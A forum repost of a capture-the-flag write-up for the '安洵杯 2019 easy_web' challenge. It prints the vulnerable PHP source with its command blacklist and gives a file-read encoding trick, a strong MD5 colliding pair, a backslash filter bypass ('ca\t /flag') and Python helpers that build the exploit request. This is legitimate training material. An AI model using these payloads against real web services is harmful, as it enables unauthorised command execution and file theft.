飞雪团队

[安洵杯 2019]easy_web

Posted on 2022-2-12 14:35:42 by 管理员 (site administrator)
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
<p>The challenge opens at ?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd= ; also look at the page source.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
<p>There is an "MD5 is funny" string here, which suggests the challenge most likely involves MD5.</p>
<p>I then captured the request; there was nothing special in the headers, so I tried starting from the URL.</p>
<p>First, base64-decode the img value once.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
<p>After one round of decoding the result still looks like base64, so decode it again.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
<p>Hex-decoding that result then gives</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">555.png
</pre>
</div>
<p>Encode index.php the same way in reverse (hex, then base64 twice):</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
</pre>
</div>
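<p>The decode and encode chain above as an added Python example (not part of the original writeup). One caveat worth knowing: the img value in the URL has no "=" padding, which PHP's base64_decode() accepts silently but Python's base64.b64decode() rejects, so the helper restores the padding first. The names decode_img and encode_img are this example's own.</p>

```python
import base64
import binascii


def _b64decode_lenient(s: str) -> bytes:
    """PHP's base64_decode() tolerates missing '=' padding; Python's
    b64decode() raises on it, so restore the padding before decoding."""
    s = s.strip()
    return base64.b64decode(s + "=" * (-len(s) % 4))


def decode_img(token: str) -> str:
    """Reverse the challenge's chain: hex2bin(base64_decode(base64_decode(img)))."""
    inner = _b64decode_lenient(token)             # first base64 layer
    hexstr = _b64decode_lenient(inner.decode())   # second base64 layer -> hex text
    return binascii.unhexlify(hexstr).decode()    # hex text -> filename


def encode_img(filename: str) -> str:
    """Forward chain used to request an arbitrary file: hex -> base64 -> base64.
    The output carries standard '=' padding; the server accepts it with or without."""
    hexstr = binascii.hexlify(filename.encode())  # e.g. b'696e6465782e706870' for index.php
    return base64.b64encode(base64.b64encode(hexstr)).decode()


if __name__ == "__main__":
    print(decode_img("TXpVek5UTTFNbVUzTURabE5qYz0"))  # the default img value
    print(encode_img("index.php"))                     # value to put in the URL
```

<p>encode_img("555.png") returns the page's default token with a trailing "=" appended; stripping the padding gives the exact string from the redirect.</p>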
<p>Put that into the address bar as the img parameter.</p>
<p>Then view the page source and base64-decode the long string it contains; the result is the PHP source of index.php:</p>
<div class="cnblogs_code">
<pre>&lt;?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd=');
// img is base64 -&gt; base64 -&gt; hex before it is used as a filename
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

// only [a-zA-Z0-9.] survive, so "/" is stripped; any name containing "flag" is refused
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '&lt;img src ="./ctf3.jpeg"&gt;';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "&lt;img src='data:image/gif;base64," . $txt . "'&gt;&lt;/img&gt;";
    echo "&lt;br&gt;";
}
echo $cmd;
echo "&lt;br&gt;";
// command blacklist; note that a lone backslash is not in it
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&amp;[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|&lt;|&gt;/i", $cmd)) {
    echo("forbid ~");
    echo "&lt;br&gt;";
} else {
    // strict comparisons: a real MD5 collision is required, then cmd runs via backticks
    if ((string)$_POST['a'] !== (string)$_POST['b'] &amp;&amp; md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?&gt;
&lt;html&gt;
&lt;style&gt;
  body{
   background:url(./bj.png)  no-repeat center center;
   background-size:cover;
   background-attachment:fixed;
   background-color:#CCCCCC;
}
&lt;/style&gt;
&lt;body&gt;
&lt;/body&gt;
&lt;/html&gt;</pre>
</div>
<p>Combined with the earlier inference, the key code is</p>
<div class="cnblogs_code">
<pre>    if ((string)$_POST['a'] !== (string)$_POST['b'] &amp;&amp; md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }</pre>
</div>
<p>This MD5 check needs a genuine ("strong") MD5 collision: a and b are cast to string and compared with !==, and their hashes are compared with ===, so neither passing arrays nor the usual "0e" magic hashes gets past it. You need two different byte strings with the same MD5, such as the well-known colliding pair below.</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
<p>Sending these two values as POST parameters a and b is enough to make the server treat whatever is in cmd as a shell command.</p>
<p>So the payload is:</p>
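<p>An added Python example (not from the original writeup) that verifies the pair above really collides, emulates the server's strict check, and builds the request: cmd goes in the query string, the colliding pair in the POST body, every byte percent-encoded so the NUL and non-ASCII bytes survive transport. The base URL and the function names are this example's own; the img value is the default from the redirect.</p>

```python
import hashlib
from urllib.parse import quote

# The 64-byte colliding messages quoted in the writeup (Marc Stevens' single-block pair).
COLLISION_A = bytes.fromhex(
    "4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518"
    "afbfa200a8284bf36e8e4b55b35f427593d849676da0d1555d8360fb5f07fea2"
)
COLLISION_B = bytes.fromhex(
    "4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518"
    "afbfa202a8284bf36e8e4b55b35f427593d849676da0d1d55d8360fb5f07fea2"
)
DEFAULT_IMG = "TXpVek5UTTFNbVUzTURabE5qYz0"  # value the challenge redirects to


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def php_md5_gate(a: bytes, b: bytes) -> bool:
    """Emulates `(string)$a !== (string)$b && md5($a) === md5($b)`.
    Both comparisons are strict, so only a real collision passes;
    two different "0e..." digests are simply two different strings."""
    return a != b and md5_hex(a) == md5_hex(b)


def differing_offsets(a: bytes, b: bytes) -> list:
    """Where the two messages differ (the pair above differs in two bytes)."""
    return [i for i, (x, y) in enumerate(zip(a, b)) if x != y]


def percent_encode(data: bytes) -> str:
    """%xx-encode every byte; the messages contain 0x00 and bytes above 0x7f."""
    return "".join("%%%02x" % c for c in data)


def build_post_body() -> str:
    return "a=" + percent_encode(COLLISION_A) + "&b=" + percent_encode(COLLISION_B)


def build_request(base_url: str, cmd: str):
    """Returns (url, body, headers) for the exploit request. The command is sent
    as the GET parameter cmd; the collision pair is the POST body."""
    url = "%s/index.php?img=%s&cmd=%s" % (base_url.rstrip("/"), DEFAULT_IMG, quote(cmd, safe="/"))
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    return url, build_post_body(), headers


if __name__ == "__main__":
    print("collides:", php_md5_gate(COLLISION_A, COLLISION_B), differing_offsets(COLLISION_A, COLLISION_B))
    url, body, headers = build_request("http://target.example", "ca\\t /flag")  # hypothetical host
    print(url)
    print(body[:40] + "...")
```

<p>The request can then be sent with any HTTP client; the point of building the body by hand is that a library's default form encoding may try to treat the values as text, and these values are not text.</p>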
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>
<p>Because a backslash '\' is not blocked by the filter (the \\|\\\\ fragment in the regex becomes \|\\ after PHP double-quote escaping, a single alternative that only matches the two-character sequence "|\" rather than a lone backslash), it can be used for the bypass.</p>
<p>ls and l\s give the same result when executed, because the shell removes the backslash during quote removal before running the command.</p>
<p>Listing the root directory then shows /flag.</p>
<p>So the payload is:</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
</pre>
</div>
<p>For this challenge, since sort and dir are not blocked,</p>
<p>dir can be used instead of ls to list directories, and sort instead of cat to read the file.</p>
/ B6 O* X3 r2 h/ A<p>&nbsp;</p># K6 o+ J+ G+ B+ K5 O$ [
回复

使用道具 举报

懒得打字嘛,点击右侧快捷回复 【右侧内容,后台自定义】
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|飞雪团队

GMT+8, 2025-6-29 18:29 , Processed in 0.138202 second(s), 21 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表